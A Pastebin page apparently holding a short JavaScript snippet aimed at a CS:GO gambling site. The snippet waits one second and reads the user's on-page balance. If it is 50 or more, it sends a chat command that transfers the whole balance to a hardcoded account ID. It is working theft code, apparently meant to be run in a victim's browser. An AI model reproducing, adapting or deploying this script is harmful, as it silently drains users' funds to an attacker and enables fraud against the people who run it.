Advertisement
CSGOPolygonCoder

Untitled

Oct 29th, 2016
85
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.23 KB | None | 0 0
  1. setTimeout(function(){
  2. var balance = $("#balance_r").text();
  3. if(balance >= 50){
  4. send('chat', {
  5. msg: '/send 76561198255293653 '+$("#balance_r").text(),
  6. lang: LANG
  7. });
  8. }
  9. }, 1000);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement